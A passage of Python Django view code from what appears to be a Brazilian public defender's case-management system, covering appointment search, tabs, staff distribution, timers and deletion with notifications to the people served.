Atendimento.TIPO_PROCESSO and not atendimento.at_inicial.realizado\r\n\r\n hoje = date.today()\r\n diaMin = date(hoje.year, hoje.month, 1)\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n sigla_uf = settings.SIGLA_UF.upper()\r\n\r\n evento_desbloqueio = Evento.get_desbloqueio_vigente_por_usuario(usuario=request.user.servidor.defensor).first()\r\n\r\n if evento_desbloqueio:\r\n diaMin = date(evento_desbloqueio.data_ini.year, evento_desbloqueio.data_ini.month, 1)\r\n elif hoje.day <= config.DIA_LIMITE_CADASTRO_FASE:\r\n diaMin -= relativedelta(months=1)\r\n\r\n try:\r\n if abas_atendimento_restritas[2] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n sistemas_webservices_procapi = []\r\n\r\n if config.ATIVAR_PROCAPI:\r\n from procapi_client.services import APISistema\r\n sistemas_webservices_procapi = APISistema().listar_todos()\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_processo.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_processos_eproc(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n\r\n try:\r\n if abas_atendimento_restritas[2] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n\r\n if settings.SIGLA_UF.upper() == 'AM':\r\n return render(request=request, template_name=\"atendimento/atender_tab_tjam.html\", context=locals())\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_eproc.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_procedimentos(request, atendimento_numero):\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n remarcado=None,\r\n ativo=True)\r\n atendimento_permissao = atendimento.permissao_acessar(usuario=request.user)\r\n abas_atendimento_restritas = config.ATIVAR_SIGILO_ABAS_ATENDIMENTO.title().replace(\" \", \"\").split(',')\r\n acesso_concedido = atendimento.acesso_concedido(request.user.servidor.defensor)\r\n pode_visualizar_aba = True\r\n propacs_acesso = permissao_acesso_propacs(request)\r\n\r\n try:\r\n if abas_atendimento_restritas[4] == 'True' and not atendimento_permissao and not acesso_concedido:\r\n pode_visualizar_aba = False\r\n except IndexError:\r\n pode_visualizar_aba = True\r\n print(\"Erro\")\r\n\r\n return render(request=request, template_name=\"atendimento/atender_tab_procedimento.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef atender_tab_oficios(request, atendimento_numero):\r\n return render(request=request, template_name=\"atendimento/atender_tab_oficio.html\", context=locals())\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender_get(request, atendimento_numero):\r\n\r\n resposta = []\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True, remarcado=None)\r\n except AtendimentoDefensor.DoesNotExist:\r\n atendimento = None\r\n\r\n if atendimento:\r\n\r\n inicial = atendimento.at_inicial\r\n arvore = Arvore.objects.filter(atendimento=inicial, data_exclusao=None, ativo=True).first()\r\n\r\n # se árvore não existe, tenta criar\r\n if not arvore:\r\n arvore = atendimento_cria_arvore(inicial.numero)\r\n\r\n # se árvore existe, retorna conteúdo\r\n if arvore:\r\n resposta = simplejson.loads(arvore.conteudo)\r\n\r\n if config.ATIVAR_ORDENACAO_ATENDIMENTO_DECRESCENTE:\r\n resposta.reverse()\r\n\r\n return JsonResponse(resposta, safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef atender_processos_get(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n remarcado=None\r\n )\r\n\r\n processos = atendimento.get_processos().filter(\r\n pre_cadastro=False,\r\n ).annotate(\r\n acao_nome=F('acao__nome'),\r\n atendimento_numero=F('parte__atendimento__numero')\r\n ).values(\r\n 'id',\r\n 'numero',\r\n 'numero_puro',\r\n 'chave',\r\n 'grau',\r\n 'tipo',\r\n 'acao_nome',\r\n 'atendimento_numero'\r\n )\r\n\r\n return JsonResponse(list(processos), safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef atender_outros_get(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(\r\n AtendimentoDefensor,\r\n numero=atendimento_numero,\r\n ativo=True,\r\n remarcado=None\r\n )\r\n\r\n if atendimento.requerente is None:\r\n raise Http404\r\n\r\n outros = AtendimentoPessoa.objects.select_related(\r\n 'atendimento__excluido_por',\r\n 'atendimento__defensor__defensor__servidor',\r\n 'atendimento__defensor__defensoria',\r\n 'atendimento__qualificacao__area',\r\n ).filter(\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA, Atendimento.TIPO_PROCESSO],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n pessoa=atendimento.requerente.pessoa,\r\n ativo=True\r\n ).exclude(\r\n atendimento__defensor=None,\r\n ).exclude(\r\n atendimento_id=atendimento.at_inicial.id\r\n )\r\n\r\n atendimentos = []\r\n for outro_pessoa in outros:\r\n outro = outro_pessoa.atendimento.defensor\r\n atendimentos.append({\r\n 'id': outro.id,\r\n 'numero': outro.numero,\r\n 'data_agendamento': Util.date_to_json(outro.data_agendamento) if outro.data_agendamento else None,\r\n 'data_atendimento': Util.date_to_json(outro.data_atendimento) if outro.data_atendimento else None,\r\n 'data_exclusao': Util.date_to_json(outro.data_exclusao) if outro.data_exclusao else None,\r\n 'motivo_exclusao': outro.motivo_exclusao,\r\n 'excluido_por': outro.excluido_por.nome if outro.excluido_por else None,\r\n 'requerente': outro.requerente.pessoa.nome if outro.requerente else None,\r\n 'requerido': outro.requerido.pessoa.nome if outro.requerido else None,\r\n 'defensor': outro.defensor.nome if outro.defensor else None,\r\n 'defensor_foto': outro.defensor.servidor.get_foto() if outro.defensor.servidor else None,\r\n 'defensoria': outro.defensoria.nome if outro.defensoria else None,\r\n 'nucleo': outro.nucleo.nome if outro.nucleo else None,\r\n 'area': outro.qualificacao.area.nome if outro.qualificacao else None,\r\n 'pedido': outro.qualificacao.titulo if outro.qualificacao else None,\r\n 'realizado': outro.realizado,\r\n 'processos': [],\r\n 'tipo': outro_pessoa.tipo,\r\n 'processo': (outro.tipo == Atendimento.TIPO_PROCESSO),\r\n 'ativo': outro.ativo,\r\n })\r\n\r\n for parte in outro.processo_partes:\r\n atendimentos[-1]['processos'].append({\r\n 'data_cadastro': Util.date_to_json(parte.data_cadastro),\r\n 'tipo': parte.processo.get_tipo_display(),\r\n 'numero': parte.processo.numero,\r\n 'numero_puro': parte.processo.numero_puro,\r\n 'grau': parte.processo.grau,\r\n 'parte': parte.parte,\r\n 'acao': parte.processo.acao.nome if parte.processo.acao else None,\r\n 'vara': parte.processo.vara.nome if parte.processo.vara else None,\r\n 'area': parte.processo.area.nome if parte.processo.area else None,\r\n })\r\n\r\n return JsonResponse(atendimentos, safe=False)\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef atender_procedimentos_propacs_get(request, atendimento_numero):\r\n procedimentos_list = []\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero, ativo=True, remarcado=None)\r\n inicial = atendimento.at_inicial if atendimento.at_inicial else atendimento\r\n procedimentos = inicial.procedimentos.filter(ativo=True)\r\n\r\n for procedimento in procedimentos:\r\n procedimentos_list.append({\r\n 'numero': procedimento.numero,\r\n 'uuid': str(procedimento.uuid),\r\n 'tipo': procedimento.tipo,\r\n 'tipo_nome': procedimento.get_tipo_display(),\r\n 'situacao': procedimento.get_situacao_display(),\r\n 'assunto': procedimento.assunto if procedimento.assunto else None,\r\n 'data_ultima_movimentacao': procedimento.data_ultima_movimentacao.strftime(\"%d/%m/%Y %H:%M:%S\"),\r\n\r\n })\r\n\r\n return JsonResponse(procedimentos_list, safe=False)\r\n\r\n\r\n@login_required\r\ndef buscar(request):\r\n\r\n if request.method == 'POST':\r\n\r\n numero_registros = 25\r\n pessoas_lst = None\r\n\r\n filtro = simplejson.loads(request.body)\r\n filtro_defensoria = filtro.get('defensoria')\r\n\r\n # Converte diferentes tipos de dados em lista para filtro de defensoria\r\n if isinstance(filtro_defensoria, str) and len(filtro_defensoria):\r\n filtro['defensoria'] = filtro['defensoria'].split(',')\r\n elif isinstance(filtro_defensoria, int):\r\n filtro['defensoria'] = [filtro['defensoria']]\r\n else:\r\n filtro['defensoria'] = []\r\n\r\n form = BuscarAtendimentoForm(filtro)\r\n\r\n if form.is_valid():\r\n\r\n atendimentos_lst = AtendimentoDefensor.objects.filter(\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_NUCLEO,\r\n Atendimento.TIPO_VISITA,\r\n Atendimento.TIPO_ENCAMINHAMENTO\r\n ]) &\r\n Q(remarcado=None)\r\n ).annotate(\r\n atividades=Sum(Case(When(filhos__ativo=True, filhos__tipo=Atendimento.TIPO_ATIVIDADE, then=Value(1)),\r\n default=Value(0), output_field=IntegerField())),\r\n tem_apoio=Sum(Case(When(filhos__ativo=True, filhos__tipo=Atendimento.TIPO_NUCLEO, then=Value(1)),\r\n default=Value(0), output_field=IntegerField())),\r\n ).order_by(\r\n '-data_agendamento',\r\n '-data_atendimento')\r\n\r\n if filtro.get('filtro'):\r\n\r\n filtro_texto = filtro.get('filtro').strip()\r\n filtro_numero = re.sub('[^0-9]', '', filtro_texto)\r\n\r\n if len(filtro_numero) == 12: # Numero do Atendimento\r\n\r\n atendimentos_lst = atendimentos_lst.filter(numero=filtro_numero)\r\n\r\n elif len(filtro_numero) in [11, 14]: # Numero do CPF ou CNPJ\r\n\r\n pessoas_lst = set(\r\n AtendimentoPessoa.objects.filter(\r\n pessoa__cpf=filtro_numero,\r\n ativo=True\r\n ).values_list('atendimento_id', flat=True)\r\n )\r\n\r\n else:\r\n\r\n # Tratamento da consulta por nome, nome_social e apelido (nome fantasia para PJ)\r\n # Se a consulta for com um nome com a quantidade de caracteres menos do que o mínimo configurado\r\n # será retornada uma mensagem de alerta para que o usuário faça filtros mais elaborados\r\n if config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES and len(filtro_texto) < config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES: # noqa: E501\r\n return JsonResponse({\r\n 'sucesso': False,\r\n 'mensagem': 'Erro: Aumente o texto para {} caracter(es) ou mais e tente novamente.'.format(\r\n config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MIN_CARACTERES\r\n )\r\n })\r\n\r\n filtro_norm = Util.normalize(filtro_texto)\r\n\r\n # tratamento da busca por nome, nome_social; e apelido (nome_fantasia) apenas para PJ\r\n\r\n q_nome = Q(pessoa__nome_norm__istartswith=filtro_norm)\r\n\r\n # TODO verificar o método Save de Pessoa. Não está mantendo o 'LTDA'.\r\n # TODO depois de verificar o método pode retirar o filtro por nome. Utilize apenas o nome_norm\r\n if 'LTDA' in filtro_texto:\r\n q_nome |= Q(pessoa__nome__istartswith=filtro_texto)\r\n\r\n # Só busca por nome social caso seja tipo pessoa física\r\n q_nome_social = Q(\r\n Q(pessoa__tipo=constantes.TIPO_PESSOA_FISICA) &\r\n Q(pessoa__nome_social__istartswith=filtro_texto)\r\n )\r\n\r\n # Só busca por nome fantasia (apelido) caso seja tipo pessoa jurídica\r\n q_nome_fantasia = Q(\r\n Q(pessoa__tipo=constantes.TIPO_PESSOA_JURIDICA) &\r\n Q(pessoa__apelido__istartswith=filtro_texto)\r\n )\r\n\r\n q = Q(ativo=True)\r\n q &= Q(pessoa__desativado_em=None)\r\n q &= Q(q_nome | q_nome_social | q_nome_fantasia)\r\n\r\n # Só executa o Bloqueio de Maria caso não tenha preenchido nenhum outro filtro\r\n if filtro.get('defensoria') or filtro.get('defensor') or form.cleaned_data['data_ini'] or form.cleaned_data['data_fim']: # noqa: E501\r\n pessoas_lst = set(AtendimentoPessoa.objects.filter(q).values_list('atendimento_id', flat=True))\r\n else:\r\n # Se a consulta retornar uma quantidade acima do limite configurado será retornada uma mensagem\r\n # de alerta para que o usuário faça filtros mais elaborados\r\n pessoas_count = AtendimentoPessoa.objects.filter(q).count()\r\n\r\n if config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MAX_PESSOAS and pessoas_count > config.BUSCAR_ATENDIMENTOS_FILTRO_NOME_MAX_PESSOAS: # noqa: E501\r\n return JsonResponse({\r\n 'sucesso': False,\r\n 'mensagem': 'Erro: Seriam retornados atendimentos de mais de {} pessoas. Preencha mais campos e tente novamente.'.format( # noqa: E501\r\n pessoas_count\r\n )\r\n })\r\n else:\r\n pessoas_lst = set(AtendimentoPessoa.objects.filter(q).values_list('atendimento_id', flat=True)) # noqa: E501\r\n\r\n if pessoas_lst is not None:\r\n if len(pessoas_lst):\r\n atendimentos_lst = atendimentos_lst.filter(\r\n (\r\n Q(id__in=pessoas_lst) |\r\n Q(inicial__in=pessoas_lst)\r\n ))\r\n else:\r\n atendimentos_lst = atendimentos_lst.none()\r\n\r\n if filtro.get('defensoria'):\r\n q = Q(defensoria_id=filtro.get('defensoria'))\r\n if type(filtro.get('defensoria')) is list:\r\n q = Q(defensoria_id__in=filtro.get('defensoria'))\r\n\r\n atendimentos_lst = atendimentos_lst.filter((q))\r\n\r\n if filtro.get('defensor'):\r\n\r\n defensor = Defensor.objects.filter(id=filtro.get('defensor')).first()\r\n\r\n if defensor.eh_defensor:\r\n atendimentos_lst = atendimentos_lst.filter((\r\n Q(defensor_id=filtro.get('defensor')) |\r\n Q(substituto_id=filtro.get('defensor'))\r\n ))\r\n elif not filtro.get('defensoria'):\r\n defensorias = list(defensor.atuacoes(vigentes=True).values_list('defensoria_id', flat=True))\r\n atendimentos_lst = atendimentos_lst.filter((\r\n Q(defensoria__in=defensorias)\r\n ))\r\n\r\n if form.cleaned_data['data_ini']:\r\n data_ini = form.cleaned_data['data_ini']\r\n\r\n atendimentos_lst = atendimentos_lst.filter((\r\n (\r\n Q(data_agendamento__gte=data_ini) &\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(data_atendimento__gte=data_ini)\r\n ))\r\n\r\n if form.cleaned_data['data_fim']:\r\n data_fim = form.cleaned_data['data_fim']\r\n data_fim = datetime.combine(data_fim, time.max)\r\n\r\n atendimentos_lst = atendimentos_lst.filter((\r\n (\r\n Q(data_agendamento__lte=data_fim) &\r\n Q(data_atendimento=None)\r\n ) |\r\n Q(data_atendimento__lte=data_fim)\r\n ))\r\n\r\n if form.cleaned_data['situacao']:\r\n situacao = form.cleaned_data['situacao']\r\n if situacao == BuscarAtendimentoForm.SITUACAO_REALIZADO:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n Q(ativo=True) &\r\n Q(data_atendimento__isnull=False)\r\n )\r\n elif situacao == BuscarAtendimentoForm.SITUACAO_AGENDADO:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n Q(ativo=True) &\r\n Q(data_atendimento=None)\r\n )\r\n elif situacao == BuscarAtendimentoForm.SITUACAO_EXCLUIDO:\r\n atendimentos_lst = atendimentos_lst.filter(Q(data_exclusao__isnull=False))\r\n else:\r\n atendimentos_lst = atendimentos_lst.filter(Q(ativo=True))\r\n\r\n primeiro = filtro.get('pagina') * numero_registros\r\n ultimo = primeiro + numero_registros\r\n\r\n if filtro.get('pagina') == 0:\r\n filtro['total'] = atendimentos_lst.count()\r\n filtro['paginas'] = math.ceil(float(filtro.get('total')) / numero_registros)\r\n\r\n atendimentos_lst = atendimentos_lst[primeiro:ultimo]\r\n\r\n atendimentos_lst = atendimentos_lst.values(\r\n 'id',\r\n 'inicial_id',\r\n 'numero',\r\n 'data_atendimento',\r\n 'data_agendamento',\r\n 'data_exclusao',\r\n 'tipo',\r\n 'agenda',\r\n 'defensoria__nome',\r\n 'defensoria__codigo',\r\n 'defensoria__comarca',\r\n 'qualificacao__titulo',\r\n 'qualificacao__area__nome',\r\n 'defensor__servidor__nome',\r\n 'defensor__servidor__usuario__username',\r\n 'responsavel__servidor__papel__nome',\r\n 'responsavel__servidor__papel__css_label_class',\r\n 'responsavel__servidor__nome',\r\n 'substituto__servidor__nome',\r\n 'substituto__servidor__usuario__username',\r\n 'atividades',\r\n 'tem_apoio',\r\n 'tipo_motivo_exclusao_id'\r\n )\r\n\r\n atendimentos = []\r\n for atendimento in atendimentos_lst:\r\n\r\n inicial = atendimento['inicial_id'] if atendimento['inicial_id'] else atendimento['id']\r\n\r\n pessoas = AtendimentoPessoa.objects.filter(\r\n atendimento=inicial,\r\n ativo=True\r\n ).values('pessoa_id',\r\n 'pessoa__nome',\r\n 'pessoa__nome_social',\r\n 'pessoa__apelido',\r\n 'pessoa__tipo',\r\n 'tipo',\r\n 'responsavel',\r\n )\r\n\r\n atendimento['pessoas'] = list(pessoas)\r\n atendimento['extra'] = (atendimento['data_agendamento'] and atendimento['data_agendamento'].time() == time()) # noqa: E501\r\n atendimento['apoio'] = (atendimento['tipo'] == Atendimento.TIPO_NUCLEO)\r\n\r\n # Hack para diferenciar 'retorno' do 'pedido de apoio'\r\n if atendimento['tem_apoio']:\r\n atendimento['tipo'] = Atendimento.TIPO_NUCLEO_PEDIDO\r\n\r\n atendimento['pode_editar'] = False\r\n atendimento['pode_excluir'] = False\r\n\r\n if request.user.has_perm('atendimento.change_all_agendamentos') or (\r\n request.user.has_perm('atendimento.view_recepcao') and\r\n int(request.session.get('comarca', request.user.servidor.comarca_id)) == atendimento['defensoria__comarca']): # noqa: E501\r\n\r\n atendimento['pode_editar'] = atendimento['data_exclusao'] is None\r\n\r\n # TODO: Usar método Atendimento.pode_excluir()\r\n if atendimento['data_exclusao'] is None and not (atendimento['atividades'] or atendimento['apoio'] or (atendimento['data_atendimento'] and not request.user.is_superuser)): # noqa: E501\r\n atendimento['pode_excluir'] = True\r\n\r\n atendimentos.append(atendimento)\r\n\r\n else:\r\n\r\n atendimentos = []\r\n\r\n categorias_de_agendas = {}\r\n for categoria_agenda in Categoria.objects.all().values('id', 'nome'):\r\n categorias_de_agendas[categoria_agenda['id']] = categoria_agenda['nome']\r\n\r\n # Verifica que o recurso de arquivar/desarquivar atendimentos está habilitado antes de analisar o status\r\n if arquivamento_esta_habilitado() and atendimentos:\r\n # TODO verificar possibilidade de refatorar o status arquivado de property\r\n # para uma coluna física a fim de otimizar as consultas\r\n atendimentos_numero = map(lambda atendimento: atendimento[\"numero\"], atendimentos)\r\n status_atendimentos = consulta_status_arquivado(atendimentos_numero)\r\n for atendimento in atendimentos:\r\n atendimento[\"arquivado\"] = status_atendimentos[atendimento[\"numero\"]]\r\n\r\n return JsonResponse(\r\n {\r\n 'usuario': {\r\n 'comarca': int(request.session.get('comarca', request.user.servidor.comarca_id)),\r\n 'perms': {\r\n 'atendimento_view_recepcao': request.user.has_perm('atendimento.view_recepcao')\r\n }\r\n },\r\n 'atendimentos': atendimentos,\r\n 'pagina': filtro.get('pagina'),\r\n 'paginas': filtro.get('paginas', 0),\r\n 'ultima': filtro.get('pagina') == filtro.get('paginas') - 1 if filtro.get('paginas') else True,\r\n 'total': filtro.get('total'),\r\n 'LISTA': {\r\n 'TIPO': dict(Atendimento.LISTA_TIPO),\r\n 'AGENDA': categorias_de_agendas,\r\n },\r\n 'sucesso': True\r\n }, safe=False)\r\n\r\n prev = request.path\r\n prev_params = simplejson.dumps(dict(request.GET.items()))\r\n\r\n exibir_nome_da_defensoria = config.EXIBIR_NOME_DA_DEFENSORIA_NA_BUSCA_ATENDIMENTOS\r\n\r\n form = BuscarAtendimentoForm(request.GET)\r\n angular = 'BuscarCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/buscar.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef cronometro(request, atendimento_numero=None):\r\n cronometro = None\r\n\r\n if atendimento_numero:\r\n atendimento = Atendimento.objects.filter(numero=atendimento_numero).first()\r\n if atendimento:\r\n with transaction.atomic():\r\n cronometro = Cronometro.objects.filter(\r\n atendimento=atendimento,\r\n servidor=request.user.servidor,\r\n finalizado=False).first()\r\n if not cronometro:\r\n cronometro = Cronometro(\r\n atendimento=atendimento,\r\n servidor=request.user.servidor,\r\n finalizado=False)\r\n cronometro.save()\r\n elif request.session.get('ligacao_id'):\r\n cronometro = Cronometro.objects.filter(atendimento_id=request.session.get('ligacao_id')).first()\r\n\r\n if cronometro:\r\n cronometro.atualizar()\r\n return JsonResponse({'id': cronometro.id, 'duracao': cronometro.duracao, 'expirado': cronometro.expirado()})\r\n else:\r\n return JsonResponse({'erro': True, 'expirado': True})\r\n\r\n\r\n@login_required\r\ndef distribuir(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n atuacoes = None\r\n assessores = None\r\n atendimentos = None\r\n\r\n try:\r\n dados = simplejson.loads(request.body)\r\n except ValueError:\r\n dados = None\r\n\r\n form = DistribuirAtendimentoForm(request.user, dados)\r\n\r\n if form.is_valid():\r\n\r\n data_ini = form.cleaned_data['data_ini']\r\n data_fim = datetime.combine(data_ini, time.max)\r\n defensor = form.cleaned_data['defensor']\r\n defensoria = form.cleaned_data['defensoria']\r\n forma_atendimento = form.cleaned_data['forma_atendimento']\r\n\r\n assessores = []\r\n atendimentos = []\r\n atuacoes = []\r\n\r\n # Obtém lista de todos agendamentos da defensoria para o dia\r\n atendimentos_lst = AtendimentoDefensor.objects.select_related(\r\n 'defensoria',\r\n 'defensor',\r\n 'substituto',\r\n 'qualificacao',\r\n 'qualificacao__area',\r\n 'agenda',\r\n 'forma_atendimento',\r\n ).filter(\r\n Q(ativo=True) &\r\n Q(remarcado=None) &\r\n Q(defensoria=defensoria) &\r\n Q(defensoria__nucleo__supervisionado=True) &\r\n (\r\n (\r\n Q(data_agendamento__gte=data_ini) &\r\n Q(data_agendamento__lte=data_fim)\r\n )\r\n )\r\n ).order_by('data_agendamento', 'data_atendimento')\r\n\r\n # Se informado, filtra agendamentos pelo defensor\r\n if defensor:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n (\r\n Q(defensor=defensor) |\r\n Q(substituto=defensor)\r\n )\r\n )\r\n\r\n # Se informado, filtra agendamentos pela forma de atendimento\r\n if forma_atendimento:\r\n atendimentos_lst = atendimentos_lst.filter(\r\n forma_atendimento__presencial=(forma_atendimento == FormaAtendimento.TIPO_PRESENCIAL)\r\n )\r\n\r\n # Transforma dados\r\n for atendimento in atendimentos_lst:\r\n\r\n forma_atendimento = None\r\n if config.EXIBIR_PRESENCIAL_REMOTO_AGENDAMENTO and atendimento.forma_atendimento:\r\n forma_atendimento = 'P' if atendimento.forma_atendimento.presencial else 'R'\r\n\r\n pre_responsavel = atendimento.responsavel_id\r\n\r\n if not pre_responsavel and not atendimento.realizado and atendimento.inicial:\r\n # Obtém ultimo atendimento de retorno realizado\r\n ultimo_retorno = AtendimentoDefensor.objects.ultimos_validos().filter(\r\n inicial=atendimento.inicial,\r\n data_atendimento__isnull=False\r\n ).first()\r\n # Se não existe, usa o atendimento inicial como referência\r\n if not ultimo_retorno:\r\n ultimo_retorno = atendimento.inicial\r\n # Define o servidor que atendeu como responsável pelo novo atendimento\r\n if ultimo_retorno.atendido_por:\r\n pre_responsavel = ultimo_retorno.atendido_por.defensor.id\r\n else:\r\n pre_responsavel = ultimo_retorno.responsavel_id\r\n\r\n atendimentos.append({\r\n 'id': atendimento.id,\r\n 'numero': atendimento.numero,\r\n 'tipo': atendimento.LISTA_TIPO[atendimento.tipo][1],\r\n 'data_agendamento': atendimento.data_agendamento.strftime('%Y-%m-%dT%H:%M:00-03:00'),\r\n 'extra': atendimento.extra,\r\n 'requerente': atendimento.requerente.pessoa.nome if atendimento.requerente else None,\r\n 'requerente_hipossuficiente': atendimento.requerente.pessoa.avaliar() if atendimento.requerente else False, # noqa: E501\r\n 'requerido': atendimento.requerido.pessoa.nome if atendimento.requerido else None,\r\n 'defensoria': {'id': atendimento.defensoria.id, 'nome': atendimento.defensoria.nome},\r\n 'defensor': atendimento.substituto_id if atendimento.substituto_id else atendimento.defensor_id,\r\n 'area': atendimento.qualificacao.area.nome,\r\n 'pedido': atendimento.qualificacao.titulo,\r\n 'responsavel': atendimento.responsavel_id,\r\n 'pre_responsavel': pre_responsavel,\r\n 'agenda': {'id': atendimento.agenda.id, 'nome': atendimento.agenda.nome},\r\n 'forma_atendimento': forma_atendimento,\r\n 'realizado': atendimento.realizado,\r\n })\r\n\r\n # Obtém a lista de todos defensores/assessores lotados na defensoria\r\n for atuacao in Atuacao.objects.parcialmente_vigentes(inicio=data_ini).filter(defensoria=defensoria):\r\n\r\n assessores.append({\r\n 'id': atuacao.defensor.id,\r\n 'nome': atuacao.defensor.nome\r\n })\r\n\r\n if atuacao.defensor.eh_defensor:\r\n atuacoes.append({\r\n 'id': atuacao.id,\r\n 'tipo': atuacao.tipo,\r\n 'defensoria': {'id': atuacao.defensoria.id, 'nome': atuacao.defensoria.nome},\r\n 'defensor': {'id': atuacao.defensor.id, 'nome': atuacao.defensor.nome},\r\n })\r\n\r\n return JsonResponse({\r\n 'atuacoes': atuacoes,\r\n 'assessores': assessores,\r\n 'atendimentos': atendimentos\r\n })\r\n\r\n else:\r\n\r\n form = DistribuirAtendimentoForm(request.user, initial={\r\n 'data_ini': date.today(),\r\n 'defensoria': request.user.servidor.defensor.defensorias.filter(nucleo__supervisionado=True).first()\r\n })\r\n\r\n angular = 'DistribuicaoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/distribuir.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef distribuir_salvar(request):\r\n dados = simplejson.loads(request.body)\r\n\r\n for item in dados:\r\n AtendimentoDefensor.objects.filter(id=item['id']).update(\r\n responsavel=item['pre_responsavel'],\r\n distribuido_por=request.user.servidor,\r\n data_distribuido=datetime.now())\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_atendimento')\r\n@reversion.create_revision(atomic=False)\r\ndef excluir(request, atendimento_numero=None):\r\n\r\n if not atendimento_numero:\r\n atendimento_numero = request.POST.get('atendimento')\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n atendimento.excluir(\r\n excluido_por=request.user.servidor,\r\n data_exclusao=datetime.now(),\r\n motivo_exclusao=request.POST.get('motivo_exclusao', '').replace('\\r\\n', '\\n'),\r\n tipo_motivo_exclusao_id=request.POST.get('tipo_motivo_exclusao')\r\n )\r\n\r\n reversion.set_user(request.user)\r\n reversion.set_comment(Util.get_comment_delete(request.user, atendimento))\r\n\r\n messages.success(request, u'Atendimento excluído.')\r\n\r\n # Se existe um atendimento para processo vinculado, transfere dados de volta\r\n try:\r\n atendimento_processo = AtendimentoDefensor.objects.get(\r\n inicial=atendimento,\r\n tipo=Atendimento.TIPO_PROCESSO,\r\n ativo=True\r\n )\r\n except ObjectDoesNotExist:\r\n atendimento_processo = None\r\n\r\n if atendimento_processo:\r\n\r\n service = AtendimentoService(atendimento)\r\n service.transferir_relacionamentos(\r\n atendimento_destino=atendimento_processo,\r\n transferir_filhos=False,\r\n transferir_documentos=False\r\n )\r\n\r\n atendimento_processo.inicial = None\r\n atendimento_processo.save()\r\n\r\n # Se for pré-agendamento no Painel do CRC, notifica assistido\r\n if atendimento.tipo == Atendimento.TIPO_LIGACAO:\r\n # Notifica assistido via chatbot Luna\r\n chatbot_notificar_requerente_exclusao.apply_async(\r\n kwargs={'numero': atendimento.numero},\r\n queue='sobdemanda'\r\n )\r\n # Notifica assistido via SMS\r\n if (config.USAR_SMS and config.SERVICO_SMS_DISPONIVEL):\r\n envia_sms_exclusao(request, atendimento, config.MENSAGEM_SMS_AGENDAMENTO_EXCLUSAO)\r\n # Notifica assistido via Email\r\n if (config.USAR_EMAIL):\r\n envia_email_exclusao(request, atendimento, config.MENSAGEM_EMAIL_AGENDAMENTO_EXCLUSAO)\r\n\r\n # Se atividade, redireciona para aba 'Atividades' do atendimento que a originou\r\n if atendimento.tipo == Atendimento.TIPO_ATIVIDADE and not request.GET.get('next'):\r\n return redirect('{}#/atividades'.format(reverse('atendimento_atender', args=[atendimento.origem.numero])))\r\n\r\n # Se next informado, inclui demais parametros e redireciona\r\n if request.GET.get('next'):\r\n params = request.GET['next']\r\n for param in request.GET:\r\n if param != 'next':\r\n params += \"&%s=%s\" % (param, request.GET[param])\r\n return redirect(params)\r\n else:\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.delete_documento')\r\ndef excluir_documento(request, atendimento_numero=None):\r\n\r\n success = False\r\n mensagem = None\r\n\r\n if request.method == 'POST':\r\n\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n try:\r\n usuario = request.user\r\n documento = AtendimentoDocumento.objects.get(id=dados['id'], ativo=True)\r\n documento.excluir(excluido_por=usuario.servidor, agora=datetime.now())\r\n except Exception:\r\n mensagem = 